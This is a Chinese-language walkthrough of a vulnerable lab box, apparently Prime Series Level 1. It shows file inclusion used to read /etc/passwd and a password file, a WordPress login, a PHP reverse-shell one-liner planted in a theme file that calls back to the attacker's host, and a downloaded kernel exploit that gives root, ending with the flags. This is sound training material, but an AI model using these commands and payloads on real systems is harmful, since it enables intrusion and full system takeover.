└─$ curl http://10.10.10.132/image.php?secrettier360
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

提示获得正确的参数，尝试能否包含passwd文件

└─$ curl http://10.10.10.132/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>

发现有个特殊的saket用户提示password.txt在/home/saket下，包含这个文件

└─$ curl http://10.10.10.132/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

得到内容follow_the_ippsec

账户saket,victor，密码follow_the_ippsec尝试登录ssh

└─$ ssh saket@10.10.10.132
The authenticity of host '10.10.10.132 (10.10.10.132)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.132' (ED25519) to the list of known hosts.
saket@10.10.10.132's password:
Permission denied, please try again.
┌──(kali㉿kali)-[~/Desktop/Prime_Series_Level_1]
└─$ ssh victor@10.10.10.132
victor@10.10.10.132's password:
Permission denied, please try again.

失败，密码错误

WordPress

枚举用户

└─$ wpscan --url http://10.10.10.132/wordpress -e u
_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.132/wordpress/ [10.10.10.132]
[+] Started: Mon Jul 24 04:41:44 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  - http://codex.wordpress.org/XML-RPC_Pingback_API
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.132/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|  - https://www.iplocation.net/defend-wordpress-from-ddos
|  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
|  - http://10.10.10.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|  - http://10.10.10.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
|  - http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
|  Rss Generator (Passive Detection)
|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|  Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jul 24 04:41:46 2023
[+] Requests Done: 13
[+] Cached Requests: 46
[+] Data Sent: 3.572 KB
[+] Data Received: 8.574 KB
[+] Memory used: 175.719 MB
[+] Elapsed time: 00:00:01

得到用户victor，用之前获得的密码follow_the_ippsec尝试登录wordpress后台

victor:follow_the_ippsec登录成功

于Appearance下的Theme Editor内的secret.php拥有可写权限，写个一句话木马

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'"); ?>

访问/wordpress/wp-content/themes/twentynineteen/secret.php路径即收到反弹的shell

└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.132] 51472
bash: cannot set terminal process group (1387): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$

主机信息收集

翻一翻有什么文件

www-data@ubuntu:/home/saket$ cd /home
cd /home
www-data@ubuntu:/home$ ls -liah
ls -liah
total 16K
1048577 drwxr-xr-x  4 root   root   4.0K Aug 29  2019 .
2 drwxr-xr-x 24 root   root   4.0K Aug 29  2019 ..
536440 drwxr-xr-x  2 root   root   4.0K Aug 31  2019 saket
1061587 drwxr-x--x 20 victor victor 4.0K Sep  1  2019 victor
www-data@ubuntu:/home$ cd saket
cd saket
www-data@ubuntu:/home/saket$ ls -liah
ls -liah
total 36K
536440 drwxr-xr-x 2 root root 4.0K Aug 31  2019 .
1048577 drwxr-xr-x 4 root root 4.0K Aug 29  2019 ..
538264 -rw------- 1 root root   20 Aug 31  2019 .bash_history
538263 -rwxr-x--x 1 root root  14K Aug 30  2019 enc
536446 -rw-r--r-- 1 root root   18 Aug 29  2019 password.txt
526540 -rw-r--r-- 1 root root   33 Aug 31  2019 user.txt
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home$ cd /home/victor
cd /home/victor
www-data@ubuntu:/home/victor$ ls -liah
ls -liah
ls: cannot open directory '.': Permission denied
www-data@ubuntu:/home/victor$

www-data@ubuntu:/home/victor$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot                 bash /root/t.sh
#
www-data@ubuntu:/home/victor$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/home/victor$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@ubuntu:/home/victor$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/victor$

本地提权

└─$ cd Desktop/Prime_Series_Level_1
└─$ searchsploit linux ubuntu 4.10.0-28
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                  | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalatio | linux/local/41760.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
└─$ searchsploit linux ubuntu -m 45010
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/Prime_Series_Level_1/45010.c

编译文件并开启http服务上传

└─$ sudo gcc 45010.c -o 45010
┌──(kali㉿kali)-[~/Desktop/Prime_Series_Level_1]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

www-data@ubuntu:/home/victor$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://10.10.10.128/45010
wget http://10.10.10.128/45010
--2023-07-24 02:22:23--  http://10.10.10.128/45010
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K) [application/octet-stream]
Saving to: '45010'
0K .......... .......... .                               100% 53.2M=0s
2023-07-24 02:22:23 (53.2 MB/s) - '45010' saved [21616/21616]
www-data@ubuntu:/tmp$ wget http://10.10.10.128/45010.c
wget http://10.10.10.128/45010.c
--2023-07-24 02:23:53--  http://10.10.10.128/45010.c
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'
0K .......... ..                                         100%  278M=0s
2023-07-24 02:23:53 (278 MB/s) - '45010.c' saved [13176/13176]

www-data@ubuntu:/tmp$ ls -liah
ls -liah
total 468K
786435 drwxrwxrwt 12 root     root     4.0K Jul 24 02:24 .
2 drwxr-xr-x 24 root     root     4.0K Aug 29  2019 ..
789604 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .ICE-unix
789607 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .Test-unix
790191 -r--r--r--  1 root     root       11 Jul 24 01:00 .X0-lock
789603 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .X11-unix
789605 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .XIM-unix
789606 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .font-unix
791565 -rwxr-xr-x  1 www-data www-data  22K Jul 24 02:19 45010
791566 -rw-r--r--  1 www-data www-data  13K Jul 24 02:15 45010.c
www-data@ubuntu:/tmp$ chmod +x 45010
chmod +x 45010
www-data@ubuntu:/tmp$ ./45010
./45010
./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010)
www-data@ubuntu:/tmp$

无法执行，尝试本编译

www-data@ubuntu:/tmp$ gcc 45010.c -o 45010x
gcc 45010.c -o 45010x
www-data@ubuntu:/tmp$ ./45010x
./45010x
whoami
root

提权成功

获取flag

python -c "import pty;pty.spawn('/bin/bash')";
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#